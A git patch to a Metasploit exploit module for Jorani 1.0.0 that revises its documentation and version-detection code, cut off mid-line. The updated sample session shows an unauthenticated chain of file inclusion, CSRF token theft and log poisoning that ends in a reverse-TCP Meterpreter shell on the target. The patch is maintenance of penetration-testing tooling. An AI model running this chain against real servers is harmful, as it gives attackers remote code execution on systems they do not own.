From 4ddd789f51ec86c8b1f101b76c2f32701d47b1d2 Mon Sep 17 00:00:00 2001 From: jheysel-r7 Date: Fri, 18 Aug 2023 15:33:59 -0400 Subject: [PATCH] Apply suggestions from code review --- .../exploit/multi/php/jorani_path_trav.md | 42 ++++++++++++------- .../exploits/multi/php/jorani_path_trav.rb | 10 +++-- 2 files changed, 32 insertions(+), 20 deletions(-) diff --git a/documentation/modules/exploit/multi/php/jorani_path_trav.md b/documentation/modules/exploit/multi/php/jorani_path_trav.md index a1938d0f36..9ce0265c32 100644 --- a/documentation/modules/exploit/multi/php/jorani_path_trav.md +++ b/documentation/modules/exploit/multi/php/jorani_path_trav.md @@ -20,6 +20,9 @@ So by chaining theses 3 vulnerabilities an unauthenticated user can execute arbi This module has been tested successfully on Jorani 1.0.0, Ubuntu 20.04 (x86_64) with kernel version 5.15.0-75. +### Installation Steps +For a step by step installation tutorial on Ubuntu please refer to [How to install Jorani](https://jorani.org/how-to-install-jorani.html) + ## Verification Steps 1. Start `msfconsole` 2. `use exploit/multi/php/jorani_path_trav` @@ -38,17 +41,17 @@ The path to the jorani website. By default it is empty. ## Scenarios ``` -msf6 exploit(multi/php/jorani_path_trav) > show options +msf6 exploit(multi/php/jorani_path_trav) > options Module options (exploit/multi/php/jorani_path_trav): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] - RHOSTS 172.31.3.3 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit + RHOSTS 172.16.199.158 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html RPORT 80 yes The target port (TCP) - SSL true no Negotiate SSL/TLS for outgoing connections - TARGETURI / yes The base path of Jorani + SSL false no Negotiate SSL/TLS for outgoing connections + TARGETURI jorani yes The base path of Jorani VHOST no HTTP server virtual host @@ -56,8 +59,8 @@ Payload options (php/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- - LHOST 172.31.3.1 yes The listen address (an interface may be specified) - LPORT 9898 yes The listen port + LHOST 172.16.199.1 yes The listen address (an interface may be specified) + LPORT 4444 yes The listen port Exploit target: @@ -69,24 +72,31 @@ Exploit target: View the full module info with the info, or info -d command. -``` -``` msf6 exploit(multi/php/jorani_path_trav) > run -[-] Handler failed to bind to 172.31.3.1:9898:- - -[*] Started reverse TCP handler on 0.0.0.0:9898 +[*] Started reverse TCP handler on 172.16.199.1:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[*] Checking Jorani version +[+] Jorani seems to be running on the target! +[+] Found version: 1.0.0 +[+] The target appears to be vulnerable. [*] Trying to exploit LFI [*] Recovering CSRF token -[+] CSRF found: 3ff4c712b884e3f577d9c3f65adac16f -[*] Poisonning log with payload.. +[+] CSRF found: be7e8205ad5f1fae2834478acdd0b546 +[*] Poisoning log with payload.. [*] Sending 1st payload -[*] Including poisonned log file log-2023-06-27.php +[*] Including poisoned log file log-2023-08-18.php. [+] Triggering payload -[*] Sending stage (39927 bytes) to 10.0.2.2 -[*] Meterpreter session 1 opened (10.0.2.15:9898 -> 10.0.2.2:46898) at 2023-06-27 19:21:28 +0200 +[*] Sending stage (39927 bytes) to 172.16.199.158 +[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.158:39624) at 2023-08-18 15:01:55 -0400 -meterpreter > getuid +meterpreter > getuid Server username: www-data +meterpreter > sysinfo +Computer : ubuntu +OS : Linux ubuntu 5.15.0-79-generic #86~20.04.2-Ubuntu SMP Mon Jul 17 23:27:17 UTC 2023 x86_64 +Meterpreter : php/linux +meterpreter > exit ``` diff --git a/modules/exploits/multi/php/jorani_path_trav.rb b/modules/exploits/multi/php/jorani_path_trav.rb index 678e821b65..2afb7d4971 100644 --- a/modules/exploits/multi/php/jorani_path_trav.rb +++ b/modules/exploits/multi/php/jorani_path_trav.rb @@ -55,7 +55,8 @@ class MetasploitModule < Msf::Exploit::Remote end def get_version(res) - matches = res.body.scan(/ v([0-9.]+) ©/i) + footer_text = res.get_html_document.xpath('//div[contains(@id, "footer")]').text + matches = footer_text.scan(/v([0-9.]+)/i) if matches.nil? || matches[0].nil? print_error('Cannot recovered Jorani version...') return nil @@ -64,7 +65,7 @@ class MetasploitModule < Msf::Exploit::Remote end def service_running(res) - matches = res.body.scan(/Leave Management System/) + matches = res.get_html_document.xpath('//head/meta[@description]/@description').text.downcase.scan(/leave management system/) if matches.nil? print_error("Jorani doesn't appear to be running on the target") return false @@ -73,8 +74,8 @@ class MetasploitModule < Msf::Exploit::Remote end def recover_csrf(res) - matches = res.body.scan(/